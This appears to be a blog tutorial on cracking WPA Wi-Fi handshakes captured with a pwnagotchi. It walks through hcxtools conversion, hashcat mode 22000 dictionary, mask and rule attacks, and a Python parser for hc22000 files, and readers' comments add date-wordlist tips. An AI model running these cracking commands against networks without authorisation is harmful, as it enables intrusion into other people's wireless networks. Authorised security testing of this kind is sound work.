Once you've collected enough crackable WPA material with your pwnagotchi, it's time to attack it with hashcat. Pwnagotchi stores the handshakes as `.pcap` files, while modern versions of hashcat use hash mode 22000. No problem, it's easy to convert between the two. On Kali, Ubuntu or Mint, install the hcxtools as follows:
```bash
sudo apt-get install hcxtools
```
Now, in the directory with all the `.pcap` files you have permission to attack, run the following command:
```bash
hcxpcapngtool *.pcap -o candidates.hc22000 -E essid.wordlist
```
This converts all the `.pcap` files into a single output file, `candidates.hc22000`. We also extract the list of ESSIDs (network names), as these might be useful in your cracking attempt.
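Before spending GPU time, it helps to know what the conversion actually produced: how many networks are in the file, and whether each entry is a PMKID (type `01`) or a full EAPOL handshake (type `02`). The script below is an added example, not part of the original post or of hcxtools; it parses the documented hc22000 line layout (`WPA*TYPE*PMKID/MIC*MACAP*MACCLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR`) and summarises the captured material per ESSID. The sample lines are constructed for the demonstration.

```python
"""Parse hashcat mode 22000 (hc22000) lines and summarise captured networks."""
import re
from collections import defaultdict
from dataclasses import dataclass

HEX = re.compile(r"^[0-9a-fA-F]*$")


@dataclass
class Entry:
    kind: str         # "pmkid" (type 01) or "eapol" (type 02)
    ap_mac: str       # colon-separated, lower case
    client_mac: str
    essid: str


def _mac(hexstr: str) -> str:
    return ":".join(hexstr[i:i + 2].lower() for i in range(0, 12, 2))


def parse_line(line: str) -> Entry:
    """Parse one line: WPA*TYPE*PMKID/MIC*MACAP*MACCLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR."""
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA":
        raise ValueError(f"not an hc22000 line: {line[:40]!r}")
    kind = {"01": "pmkid", "02": "eapol"}.get(fields[1])
    if kind is None:
        raise ValueError(f"unknown entry type {fields[1]!r}")
    digest, ap, client, essid_hex = fields[2:6]
    ok = len(digest) == 32 and len(ap) == 12 and len(client) == 12
    if not ok or not all(HEX.match(f) for f in (digest, ap, client, essid_hex)):
        raise ValueError("malformed hex field")
    # The ESSID is hex-encoded bytes; decode leniently, as not every SSID is UTF-8.
    essid = bytes.fromhex(essid_hex).decode("utf-8", errors="replace")
    return Entry(kind, _mac(ap), _mac(client), essid)


def summarise(text: str) -> dict:
    """Count PMKID and EAPOL entries per ESSID and collect the AP MACs seen."""
    summary = defaultdict(lambda: {"pmkid": 0, "eapol": 0, "aps": set()})
    for line in text.splitlines():
        if line.strip():
            e = parse_line(line)
            summary[e.essid][e.kind] += 1
            summary[e.essid]["aps"].add(e.ap_mac)
    return dict(summary)


# Constructed sample: two entries for "HomeNet" (one PMKID, one EAPOL), one PMKID for "Office-5G".
SAMPLE = "\n".join([
    "WPA*01*d41d8cd98f00b204e9800998ecf8427e*021122334455*0266778899aa*486f6d654e6574***",
    "WPA*02*00112233445566778899aabbccddeeff*021122334455*02aabbccddee*486f6d654e6574*"
    + "ab" * 32 + "*0103007502010a0000000000000000000100000000000000000000*02",
    "WPA*01*00000000000000000000000000000001*02deadbeef01*02cafe000001*4f66666963652d3547***",
])

if __name__ == "__main__":
    for essid, info in summarise(SAMPLE).items():
        print(f"{essid}: {info['pmkid']} PMKID, {info['eapol']} EAPOL, APs={sorted(info['aps'])}")
```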
Now we need hashcat. If you are running Kali, hashcat is probably already installed. If not, or if you are running Ubuntu or Mint, you can install it with the following command:
```bash
sudo apt-get install hashcat hashcat-data
# If you have an NVIDIA graphics card:
sudo apt-get install hashcat-nvidia
# Check that the install worked by running a benchmark
hashcat -m 22000 --benchmark
```
Right. Let's attack the handshakes.
```bash
hashcat -m 22000 candidates.hc22000 /usr/share/doc/hashcat-data/examples/example.dict
```
This tells hashcat to run in hash mode 22000, for cracking the WPA pre-shared key. We attack `candidates.hc22000` and we use the example wordlist in `/usr/share/doc/hashcat-data/examples/example.dict`.
You can see if hashcat was successful with the following command:
```bash
hashcat -m 22000 candidates.hc22000 --show
```
No successes? Don't worry, here are some other attacks to try:
```bash
# Try all telephone numbers in your area code:
hashcat -m 22000 candidates.hc22000 -a 3 780?d?d?d?d?d?d?d
# Try the ESSIDs:
hashcat -m 22000 candidates.hc22000 essid.wordlist
# Permute the example wordlist and the ESSIDs with a ruleset
hashcat -m 22000 candidates.hc22000 /usr/share/doc/hashcat-data/examples/example.dict essid.wordlist -r /usr/share/hashcat/rules/best64.rule
```
If that was not successful, you may want to try other wordlists. In Kali, there are a few in `/usr/share/wordlists`. Alternatively, there are plenty available online. A good list to start with is the rockyou wordlist, though it is rather large.
Remember, hashcat runs much faster if you throw a GPU (or three) at it. A modern NVIDIA GeForce RTX 4090 may crack 2500 kH/sec. A 3080 might get 900 kH/sec. Running just on the CPU without any GPU may only net you 25 kH/sec, though. That's fine for quick checks and small wordlists but much too slow for anything more significant.
What's next? Hashcat is a powerful tool, allowing significant control over the attacks. The hashcat wiki has lots of helpful information.
Happy cracking!
Top comments (2)
Thanks for the phone tip.
In fact, the most effective dict I've created was using DATES. As I am in Brazil, the format DDMMYYYY can crack a lot of hashes here, because many people use birth, wedding and so on.
If someone here wants it, I can provide the shell script to generate a text file with all possible dates from the desired date to today.
Thanks for the guide 😌. It works well.